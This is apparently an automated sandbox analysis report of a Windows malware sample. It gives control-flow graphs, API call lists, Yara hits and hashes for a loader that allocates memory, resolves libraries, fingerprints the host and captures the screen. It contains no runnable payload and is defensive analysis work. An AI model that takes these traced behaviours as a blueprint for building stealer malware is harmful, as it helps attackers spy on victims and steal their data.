                                                                                                        control_flow_graph 0 43b870-43b8af 1 43b8b0-43b95c 0->1 1->1 2 43b962-43b97f 1->2 3 43b980-43b9a4 2->3 3->3 4 43b9a6-43b9ef 3->4 5 43b9f0-43ba04 4->5 5->5 6 43ba06-43ba28 5->6 8 43bb5b-43bb6f 6->8 9 43ba2e-43ba46 6->9 10 43bb70-43bb8a 8->10 11 43ba50-43bae4 9->11 10->10 13 43bb8c-43bbef 10->13 11->11 12 43baea-43bb0f 11->12 14 43bb10-43bb3e 12->14 15 43bbf0-43bc11 13->15 14->14 16 43bb40-43bb57 14->16 15->15 17 43bc13-43bc6f 15->17 16->8 18 43bc70-43bc84 17->18 18->18 19 43bc86-43bcd4 CoCreateInstance 18->19 20 43c217-43c247 call 441c40 GetVolumeInformationW 19->20 21 43bcda-43bd1f 19->21 26 43c251-43c253 20->26 27 43c249-43c24d 20->27 23 43bd20-43bd3f 21->23 23->23 25 43bd41-43bd6c SysAllocString 23->25 32 43bd72-43bd8c CoSetProxyBlanket 25->32 33 43c206-43c213 SysFreeString 25->33 28 43c26d-43c274 26->28 27->26 30 43c276-43c27d 28->30 31 43c28d-43c2af 28->31 30->31 36 43c27f-43c28b 30->36 37 43c2b0-43c2c4 31->37 34 43bd92-43bdb2 32->34 35 43c1fc-43c202 32->35 33->20 38 43bdc0-43bde6 34->38 35->33 36->31 37->37 39 43c2c6-43c309 37->39 38->38 40 43bde8-43be72 SysAllocString 38->40 41 43c310-43c351 39->41 43 43be80-43becd 40->43 41->41 42 43c353-43c37f call 41dcb0 41->42 47 43c380-43c388 42->47 43->43 45 43becf-43bef7 SysAllocString 43->45 50 43c1e7-43c1f8 SysFreeString * 2 45->50 51 43befd-43bf1f 45->51 47->47 49 43c38a-43c38c 47->49 52 43c392-43c3a2 call 4081e0 49->52 53 43c260-43c267 49->53 50->35 58 43bf25-43bf28 51->58 59 43c1dd-43c1e3 51->59 52->53 53->28 55 43c3a7-43c3ae 53->55 58->59 60 43bf2e-43bf33 58->60 59->50 60->59 61 43bf39-43bf89 VariantInit 60->61 62 43bf90-43bfaf 61->62 62->62 63 43bfb1-43bfc2 62->63 64 43bfc6-43bfcb 63->64 65 43bfd1-43bfd7 64->65 66 43c1cc-43c1d9 VariantClear 64->66 65->66 67 43bfdd-43bfea 65->67 66->59 68 43c033 67->68 69 43bfec-43bff1 67->69 71 43c035-43c04f call 408160 68->71 70 43c00c-43c010 69->70 72 43c012-43c01d 70->72 73 43c000 70->73 80 43c055-43c05f 71->80 81 43c17e-43c18f 71->81 76 43c026-43c02c 72->76 77 43c01f-43c024 72->77 75 43c001-43c00a 73->75 75->70 75->71 76->75 79 43c02e-43c031 76->79 77->75 79->75 80->81 82 43c065-43c06f 80->82 83 43c191 81->83 84 43c196-43c1a2 81->84 85 43c070-43c07e 82->85 83->84 86 43c1a4 84->86 87 43c1a9-43c1c9 call 408190 call 408170 84->87 88 43c090-43c096 85->88 89 43c080-43c085 85->89 86->87 87->66 92 43c098-43c09b 88->92 93 43c0bd-43c0c9 88->93 91 43c130-43c134 89->91 99 43c136-43c13c 91->99 92->93 95 43c09d-43c0bb 92->95 96 43c0cb-43c0ce 93->96 97 43c148-43c150 93->97 95->91 96->97 100 43c0d0-43c121 96->100 97->99 103 43c152-43c155 97->103 99->81 102 43c13e-43c140 99->102 100->91 102->85 104 43c146 102->104 105 43c157-43c178 103->105 106 43c17a-43c17c 103->106 104->81 105->91 106->91
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                                                        • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                        • API String ID: 1810270423-2807872674
                                                                                                        • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                        • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                                                        • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                        • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
                                                                                                        • API String ID: 0-3642574725
                                                                                                        • Opcode ID: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
                                                                                                        • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                        • Opcode Fuzzy Hash: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
                                                                                                        • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 580 408880-408891 call 43fba0 583 408ab5-408ab7 ExitProcess 580->583 584 408897-40889e call 4385b0 580->584 587 408ab0 call 440240 584->587 588 4088a4-4088c8 GetCurrentProcessId GetCurrentThreadId 584->588 587->583 589 4088ca-4088cc 588->589 590 4088ce-408972 SHGetSpecialFolderPathW GetForegroundWindow 588->590 589->590 592 408974-408997 590->592 593 408999-4089a8 590->593 592->593 594 4089b0-4089c4 593->594 594->594 595 4089c6-4089f2 call 43eb20 594->595 598 408a00-408a3b 595->598 599 408a74-408a92 call 409ce0 598->599 600 408a3d-408a72 598->600 603 408a94 call 40cdd0 599->603 604 408a9e-408aa5 599->604 600->598 607 408a99 call 40ba80 603->607 604->587 605 408aa7-408aad call 408170 604->605 605->587 607->604
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                                                        • GetForegroundWindow.USER32 ref: 0040896A
                                                                                                        • ExitProcess.KERNEL32 ref: 00408AB7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                        • String ID: 6W01
                                                                                                        • API String ID: 4063528623-326071965
                                                                                                        • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                        • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                                                        • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                        • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 750 40aa32-40aa35 751 40aa82 750->751 752 40aa37-40aa5f 750->752 753 40aa60-40aa72 752->753 753->753 754 40aa74-40aa7b 753->754 757 40aa00-40aa12 754->757 757->757 758 40aa14-40aa2e 757->758
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MO$MO
                                                                                                        • API String ID: 0-3148518880
                                                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                        • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                        • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69
                                                                                                        APIs
                                                                                                        • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 492 20f003c-20f0047 493 20f004c-20f0263 call 20f0a3f call 20f0e0f call 20f0d90 VirtualAlloc 492->493 494 20f0049 492->494 509 20f028b-20f0292 493->509 510 20f0265-20f0289 call 20f0a69 493->510 494->493 511 20f02a1-20f02b0 509->511 513 20f02ce-20f03c2 VirtualProtect call 20f0cce call 20f0ce7 510->513 511->513 514 20f02b2-20f02cc 511->514 521 20f03d1-20f03e0 513->521 514->511 522 20f0439-20f04b8 VirtualFree 521->522 523 20f03e2-20f0437 call 20f0ce7 521->523 525 20f04be-20f04cd 522->525 526 20f05f4-20f05fe 522->526 523->521 530 20f04d3-20f04dd 525->530 527 20f077f-20f0789 526->527 528 20f0604-20f060d 526->528 534 20f078b-20f07a3 527->534 535 20f07a6-20f07b0 527->535 528->527 532 20f0613-20f0637 528->532 530->526 531 20f04e3-20f0505 LoadLibraryA 530->531 536 20f0517-20f0520 531->536 537 20f0507-20f0515 531->537 540 20f063e-20f0648 532->540 534->535 538 20f086e-20f08be LoadLibraryA 535->538 539 20f07b6-20f07cb 535->539 541 20f0526-20f0547 536->541 537->541 548 20f08c7-20f08f9 538->548 542 20f07d2-20f07d5 539->542 540->527 543 20f064e-20f065a 540->543 546 20f054d-20f0550 541->546 544 20f07d7-20f07e0 542->544 545 20f0824-20f0833 542->545 543->527 547 20f0660-20f066a 543->547 551 20f07e4-20f0822 544->551 552 20f07e2 544->552 556 20f0839-20f083c 545->556 553 20f0556-20f056b 546->553 554 20f05e0-20f05ef 546->554 555 20f067a-20f0689 547->555 549 20f08fb-20f0901 548->549 550 20f0902-20f091d 548->550 549->550 551->542 552->545 557 20f056f-20f057a 553->557 558 20f056d 553->558 554->530 559 20f068f-20f06b2 555->559 560 20f0750-20f077a 555->560 556->538 561 20f083e-20f0847 556->561 563 20f057c-20f0599 557->563 564 20f059b-20f05bb 557->564 558->554 565 20f06ef-20f06fc 559->565 566 20f06b4-20f06ed 559->566 560->540 567 20f084b-20f086c 561->567 568 20f0849 561->568 575 20f05bd-20f05db 563->575 564->575 569 20f06fe-20f0748 565->569 570 20f074b 565->570 566->565 567->556 568->538 569->570 570->555 575->546
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020F024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 686 40e3d3-40e540 CoInitializeEx * 2
                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        • Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                                                        • Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
                                                                                                        • Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                                                        • Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 687 5607a6-5607bf 688 5607c1-5607c3 687->688 689 5607c5 688->689 690 5607ca-5607d6 CreateToolhelp32Snapshot 688->690 689->690 691 5607e6-5607f3 Module32First 690->691 692 5607d8-5607de 690->692 693 5607f5-5607f6 call 560465 691->693 694 5607fc-560804 691->694 692->691 698 5607e0-5607e4 692->698 699 5607fb 693->699 698->688 698->691 699->694
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005607CE
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 005607EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945775576.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_560000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: f2ac7dd32b7bcaea2242f36d7a98d77d9b9b43e0297924d86d601794ae2682f4
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 9DF06D322017116FE7203AB9A88DA6F7BE8FF89765F101528E642920C0DAB0F9458A61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 700 20f0e0f-20f0e24 SetErrorMode * 2 701 20f0e2b-20f0e2c 700->701 702 20f0e26 700->702 702->701
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 760 40df92-40dfdb CoInitializeSecurity
                                                                                                        APIs
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeSecurity
                                                                                                        • String ID:
                                                                                                        • API String ID: 640775948-0
                                                                                                        • Opcode ID: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
                                                                                                        • Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
                                                                                                        • Opcode Fuzzy Hash: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
                                                                                                        • Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 761 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                        APIs
                                                                                                        • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Startup
                                                                                                        • String ID:
                                                                                                        • API String ID: 724789610-0
                                                                                                        • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                        • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                        • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                        • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 767 43eb40-43eb4c 768 43eb53-43eb54 767->768 769 43eb55-43eb67 call 441850 RtlFreeHeap 767->769
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                        • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                        • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                        • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 004404BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ForegroundWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2020703349-0
                                                                                                        • Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                        • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                                                        • Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                                                        • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                        • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                                                        • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                        • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005604B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945775576.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_560000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: d228a9cddfd9111f9a44b2e45a9b5e1d1710010e70b07292a1dc2672d5dd14c0
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: 20112B79A40208EFDB01DF98C985E99BFF5AF48351F058094FA489B362D771EA50DF80
                                                                                                        APIs
                                                                                                        • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0212BF33
                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0212BFAD
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0212BFEB
                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0212C050
                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0212C137
                                                                                                        • VariantInit.OLEAUT32(?), ref: 0212C1A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                        • API String ID: 65563702-2807872674
                                                                                                        • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                        • Instruction ID: 77c4276da296615d5311849b74d2414caa3a09d76572f1fc097f20395db45c09
                                                                                                        • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                        • Instruction Fuzzy Hash: EC52EF726483508BD724CF28C8917AFBBE1EF85314F198A2DF5958B391D774D80ACB92
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 00436989
                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                        • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                        • String ID: Y
                                                                                                        • API String ID: 1298755333-3233089245
